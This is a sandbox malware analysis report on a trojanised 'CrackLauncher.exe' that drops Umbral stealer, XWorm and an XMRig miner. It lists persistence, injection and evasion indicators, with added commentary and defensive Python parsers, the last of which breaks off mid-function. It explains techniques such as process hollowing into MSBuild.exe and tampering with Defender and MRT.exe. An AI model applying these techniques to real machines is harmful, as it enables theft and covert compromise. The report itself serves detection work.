Malware Analysis Report

2024-10-10 09:50

Sample ID 240626-lhyhma1cmj
Target CrackLauncher.exe
SHA256 87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95
Tags
umbral xmrig xworm evasion execution miner persistence ransomware rat spyware stealer trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95

Threat Level: Known bad

The file CrackLauncher.exe was found to be: Known bad.

Malicious Activity Summary

umbral xmrig xworm evasion execution miner persistence ransomware rat spyware stealer trojan upx

Suspicious use of NtCreateUserProcessOtherParentProcess

Detect Umbral payload

Umbral

Detect Xworm Payload

xmrig

Xworm

Contains code to disable Windows Defender

Renames multiple (115) files with added filename extension

XMRig Miner payload

Command and Scripting Interpreter: PowerShell

Drops file in Drivers directory

Stops running service(s)

Creates new service(s)

Drops startup file

Reads user/profile data of web browsers

Executes dropped EXE

UPX packed file

.NET Reactor protector

Power Settings

Legitimate hosting services abused for malware hosting/C2

Adds Run key to start application

Looks up external IP address via web service

Suspicious use of SetThreadContext

Drops file in System32 directory

Drops file in Windows directory

Launches sc.exe

Enumerates physical storage devices

Unsigned PE

Checks SCSI registry key(s)

Runs ping.exe

Opens file in notepad (likely ransom note)

Suspicious use of AdjustPrivilegeToken

Uses Task Scheduler COM API

Runs net.exe

Suspicious use of WriteProcessMemory

Detects videocard installed

Views/modifies file attributes

Modifies registry class

Suspicious use of SendNotifyMessage

Suspicious use of SetWindowsHookEx

Suspicious use of FindShellTrayWindow

Modifies data under HKEY_USERS

Checks processor information in registry

Suspicious behavior: EnumeratesProcesses

Scheduled Task/Job: Scheduled Task

Suspicious behavior: GetForegroundWindowSpam

Delays execution with timeout.exe

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-26 09:32

Signatures

Unsigned PE

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-26 09:32

Reported

2024-06-26 09:52

Platform

win10-20240404-en

Max time kernel

945s

Max time network

1203s

Command Line

C:\Windows\system32\lsass.exe

Signatures

Contains code to disable Windows Defender

Detect Umbral payload

Detect Xworm Payload

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 2540 created 640 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\system32\lsass.exe

Umbral

stealer umbral

Xworm

trojan rat xworm

xmrig

miner xmrig

Renames multiple (115) files with added filename extension

ransomware

XMRig Miner payload

miner

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A

Creates new service(s)

persistence execution

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts N/A N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe N/A

Stops running service(s)

evasion execution

.NET Reactor protector

Drops startup file

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk C:\Users\Admin\AppData\Local\Temp\Nursultan.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk N/A N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk N/A N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe N/A
N/A N/A C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe" C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan Setup = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan Setup.exe" C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan Setup = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan Setup.exe" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe" C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan Setup = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan Setup.exe" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan Setup = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan Setup.exe" C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe" C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan Setup = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan Setup.exe" C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe" C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe" C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan Setup = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan Setup.exe" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe" C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe" C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan Setup = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan Setup.exe" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan Setup = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan Setup.exe" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan Setup = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan Setup.exe" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan Setup = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan Setup.exe" N/A N/A
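
Collapsing and triaging Run-key rows like the ones above is tedious by hand. The following Python is an added example, not part of the sandbox report or of any tool or malware family it names: it parses rows in this report's column layout, de-duplicates them by value name and image path, records which process wrote each entry, and flags images that live in user-writable directories. The sample rows are a constructed excerpt of the table above, and the column split assumes, as holds here, that the Process and Target columns contain no spaces.

```python
import re
from typing import Optional

# Constructed excerpt of the "Adds Run key" rows above (not the full 39-row table).
# Report columns: Description Indicator Process Target, space-separated; the value
# data is quoted and backslash-escaped exactly as the report prints it.
SAMPLE_ROWS = r"""
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe" C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan Setup = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan Setup.exe" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan Setup = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan Setup.exe" C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe" C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe" N/A N/A
"""

# Key is everything up to ' = "', data is the quoted string, then Process and Target
# (assumed space-free, which is true for every row in this report).
ROW_RE = re.compile(
    r'^Set value \((?P<type>\w+)\) (?P<key>\\REGISTRY\\.+?) = "(?P<data>.*)" (?P<proc>\S+) (?P<target>\S+)$'
)
# First .exe in the value data, with or without surrounding quotes or trailing arguments.
IMAGE_RE = re.compile(r'^"?(?P<img>[^"]+?\.exe)', re.IGNORECASE)
# Directories a standard user can write to; an autostart image here is a red flag.
USER_WRITABLE = ("\\appdata\\local\\temp\\", "\\appdata\\roaming\\",
                 "\\programdata\\", "\\users\\public\\")


def hive_of(key: str) -> str:
    """Map the native \\REGISTRY\\... prefix to the hive an analyst would name."""
    parts = key.split("\\")          # ['', 'REGISTRY', 'USER', '<SID>', ...]
    if key.startswith("\\REGISTRY\\USER\\"):
        return "HKU\\" + parts[3]     # that user's HKCU
    if key.startswith("\\REGISTRY\\MACHINE\\"):
        return "HKLM"
    return "UNKNOWN"


def image_path(data: str) -> str:
    """Undo the report's backslash escaping and isolate the executable path."""
    unescaped = data.replace("\\\\", "\\")
    m = IMAGE_RE.match(unescaped)
    return m["img"] if m else unescaped


def is_user_writable(path: str) -> bool:
    return any(marker in path.lower() for marker in USER_WRITABLE)


def parse_run_row(line: str) -> Optional[dict]:
    """One report row -> hive, value name, image path, writing process (or None)."""
    m = ROW_RE.match(line.strip())
    if not m or "\\Run\\" not in m["key"]:
        return None
    return {
        "hive": hive_of(m["key"]),
        "value_name": m["key"].rsplit("\\", 1)[1],
        "image": image_path(m["data"]),
        "writer": None if m["proc"] == "N/A" else m["proc"],
    }


def summarize_run_keys(text: str) -> list:
    """Collapse duplicate rows, keeping an event count and the set of attributed writers."""
    groups = {}
    for line in text.strip().splitlines():
        ev = parse_run_row(line)
        if ev is None:
            continue
        g = groups.setdefault((ev["value_name"], ev["image"]), {
            "hive": ev["hive"], "value_name": ev["value_name"], "image": ev["image"],
            "count": 0, "writers": set(), "user_writable": is_user_writable(ev["image"]),
        })
        g["count"] += 1
        if ev["writer"]:
            g["writers"].add(ev["writer"])
    return sorted(groups.values(), key=lambda g: g["value_name"])


if __name__ == "__main__":
    for g in summarize_run_keys(SAMPLE_ROWS):
        flag = "USER-WRITABLE" if g["user_writable"] else "ok"
        print(f'{g["hive"]}\\...\\Run\\{g["value_name"]} -> {g["image"]} '
              f'x{g["count"]} writers={sorted(g["writers"])} [{flag}]')
```

The same parser applies to any Triage-style "Set value" row, so the `\Run\` filter can be widened to RunOnce, Winlogon or service ImagePath keys if those appear in a report; only the hive mapping and the user-writable list are assumptions made for this example.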

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
(64 identical events collapsed into one row; the sandbox attributed none of them to a process.)

The indicator is the bare domain. The report gives no URL path, so this table does not distinguish a webhook POST (how Umbral stealer delivers its victim report) from ordinary CDN traffic. Confirm the full URL in the Network section before using discord.com as an indicator; blocking the domain outright is rarely an option on a general-purpose network.

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A
(64 identical events collapsed into one row; the sandbox attributed none of them to a process.)

ip-api.com is a free geolocation service that returns the caller's public IP, ISP and country; stealers query it to label the victim in the report they exfiltrate. Its free endpoint is plain HTTP, so the request and the JSON reply are visible in proxy logs and in the capture.

Power Settings

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\powercfg.exe N/A
(64 events collapsed: 12 attributed to C:\Windows\system32\powercfg.exe, 52 with no process recorded.)

powercfg.exe is how a miner stops the host from sleeping or hibernating so that XMRig keeps running. The switches passed are not captured in this table; read them from the Command Line section.

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive N/A N/A
File opened for modification C:\Windows\system32\MRT.exe C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe N/A
File opened for modification C:\Windows\system32\MRT.exe C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe N/A
File opened for modification C:\Windows\system32\MRT.exe N/A N/A
(64 events collapsed into the five distinct rows above. StartupProfileData-NonInteractive: 21 events, 5 attributed to powershell.exe. MRT.exe: 43 events, 6 attributed to Nursultan Setup.exe and 4 to jqvljmboayxs.exe.)

The StartupProfileData-NonInteractive cache lives under the LocalSystem profile (system32\config\systemprofile), so it is written only when PowerShell runs as SYSTEM with no interactive session; that corroborates the service and scheduled-task persistence listed in the summary. MRT.exe is the Windows Malicious Software Removal Tool. A dropper in %TEMP% and a randomly named executable under ProgramData (C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe, the same component that sets thread context in svchost.exe and conhost.exe below) opening it for write access is consistent with the miner overwriting or neutering the tool, and writing under system32 at all means the chain is running elevated by this point. The table records only that the file was opened for modification, not what was written, so compare the on-disk MRT.exe hash with a clean copy before concluding it was replaced.

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2224 set thread context of 2540 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 4584 set thread context of 3356 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 4972 set thread context of 4420 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 512 set thread context of 4552 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 628 set thread context of 2056 N/A C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe C:\Windows\system32\conhost.exe
PID 628 set thread context of 3168 N/A C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe C:\Windows\system32\svchost.exe
PID 4284 set thread context of 5048 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\system32\sc.exe
PID 4392 set thread context of 5068 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 4808 set thread context of 2652 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\System32\Conhost.exe
PID 916 set thread context of 2188 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 2320 set thread context of 4376 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 5016 set thread context of 4468 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 2336 set thread context of 652 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 4992 set thread context of 4780 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\System32\Conhost.exe
PID 2652 set thread context of 2188 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\system32\sc.exe
PID 2756 set thread context of 392 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 1932 set thread context of 1884 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 3660 set thread context of 3384 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 4412 set thread context of 4028 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\system32\sc.exe
PID 628 set thread context of 4120 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\SYSTEM32\cmd.exe
PID 1892 set thread context of 3192 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
PID 4484 set thread context of 3700 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 3544 set thread context of 4304 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 4788 set thread context of 4552 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\system32\sc.exe
PID 3112 set thread context of 4160 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3192 set thread context of 4988 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 5012 set thread context of 4824 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\System32\Wbem\wmic.exe
PID 1552 set thread context of 1104 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\System32\Conhost.exe
PID 2188 set thread context of 2468 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 64 set thread context of 4052 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 4992 set thread context of 5036 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\system32\sc.exe
PID 5032 set thread context of 4648 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 4284 set thread context of 3708 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
PID 3400 set thread context of 1708 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\System32\Conhost.exe
PID 1332 set thread context of 4376 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 5476 set thread context of 5472 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\System32\Conhost.exe
PID 2880 set thread context of 5456 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\System32\Conhost.exe
PID 5764 set thread context of 5224 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 352 set thread context of 5584 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\System32\Conhost.exe
PID 5288 set thread context of 5532 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
PID 5584 set thread context of 5824 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 6120 set thread context of 5872 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe
PID 3988 set thread context of 5328 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 4388 set thread context of 2476 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
PID 5860 set thread context of 5548 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 3904 set thread context of 5396 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
PID 1800 set thread context of 2184 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
PID 5596 set thread context of 516 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
PID 2552 set thread context of 2216 N/A N/A
PID 5612 set thread context of 2552 N/A N/A
PID 6004 set thread context of 1280 N/A N/A
PID 3400 set thread context of 64 N/A N/A
PID 1548 set thread context of 4512 N/A N/A
PID 5364 set thread context of 5336 N/A N/A
PID 1892 set thread context of 4420 N/A N/A
PID 5244 set thread context of 1896 N/A N/A
PID 5376 set thread context of 5808 N/A N/A
PID 360 set thread context of 3100 N/A N/A
PID 4984 set thread context of 6628 N/A N/A
PID 6680 set thread context of 6452 N/A N/A
PID 6292 set thread context of 6624 N/A N/A
PID 6196 set thread context of 5244 N/A N/A
PID 6636 set thread context of 6652 N/A N/A
PID 6192 set thread context of 7040 N/A N/A

Sixty-four thread-context writes. Of the 43 rows that name a target, 22 are MSBuild.exe, with conhost.exe, sc.exe, svchost.exe, powershell.exe, wmic.exe and cmd.exe as the remaining system targets; almost every source is Nursultan.exe, with jqvljmboayxs.exe from ProgramData responsible for the svchost.exe and conhost.exe writes. Setting another process's thread context from a loader is the process-hollowing (RunPE) pattern: the child is created suspended, its image is replaced, and the entry point is redirected with SetThreadContext before the thread resumes. MSBuild.exe is a favourite host because it is Microsoft-signed and allowed by many application-control policies. Treat the PID relationships with care: PID 2188 is recorded as the sc.exe target of 2652 in one row and as the MSBuild.exe target of 916 in another, and 4376 and 4552 are targets twice, so the detonation ran long enough for PID reuse and a PID seen as both target and source is not proof of a chain. The rows from PID 5288 onward lack the process or target columns; attribute those from the Processes section rather than from this table.
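
To see the injection pattern rather than read 64 rows, the following Python is an added example (not from the report, the sandbox, or any malware family it names): it parses SetThreadContext rows in this report's layout into (source PID, target PID, source image, target image) events, counts target images, lists writes from user-writable locations into signed system binaries, and reports PIDs that occur as both source and target. The rows are a constructed excerpt of the table above, chosen to include one target path containing a space and two rows with missing columns; the list of living-off-the-land targets and the user-writable directories are assumptions made for this example, not something the report defines.

```python
import re
from collections import Counter
from dataclasses import dataclass
from typing import List, Optional

# Constructed excerpt of the "Suspicious use of SetThreadContext" rows above.
# Row shape: PID <src> set thread context of <dst> <indicator> <process> <target>
# where <process> and <target> are paths that may contain spaces or be absent.
SAMPLE_ROWS = r"""
PID 2224 set thread context of 2540 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 628 set thread context of 3168 N/A C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe C:\Windows\system32\svchost.exe
PID 4808 set thread context of 2652 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\System32\Conhost.exe
PID 2652 set thread context of 2188 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\system32\sc.exe
PID 2188 set thread context of 2468 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 5012 set thread context of 4824 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\System32\Wbem\wmic.exe
PID 4284 set thread context of 3708 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
PID 5288 set thread context of 5532 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
PID 2552 set thread context of 2216 N/A N/A
"""

HEAD_RE = re.compile(r"^PID (?P<src>\d+) set thread context of (?P<dst>\d+) (?P<rest>.*)$")
# Split the trailing columns only at a space that starts a new drive-letter path or a
# trailing N/A, so a path such as "...\Nursultan Setup.exe" keeps its internal space.
COL_SPLIT = re.compile(r" (?=[A-Za-z]:\\|N/A(?: |$))")

# Signed system binaries that loaders commonly hollow (assumption for this example).
LOLBIN_TARGETS = {"msbuild.exe", "conhost.exe", "sc.exe", "svchost.exe",
                  "powershell.exe", "cmd.exe", "wmic.exe"}
USER_WRITABLE = ("\\appdata\\local\\temp\\", "\\programdata\\",
                 "\\appdata\\roaming\\", "\\users\\public\\")


@dataclass(frozen=True)
class ContextWrite:
    src_pid: int
    dst_pid: int
    src_image: Optional[str]
    dst_image: Optional[str]


def parse_rows(text: str) -> List[ContextWrite]:
    """Turn report rows into events; missing or N/A columns become None."""
    events = []
    for line in text.strip().splitlines():
        m = HEAD_RE.match(line.strip())
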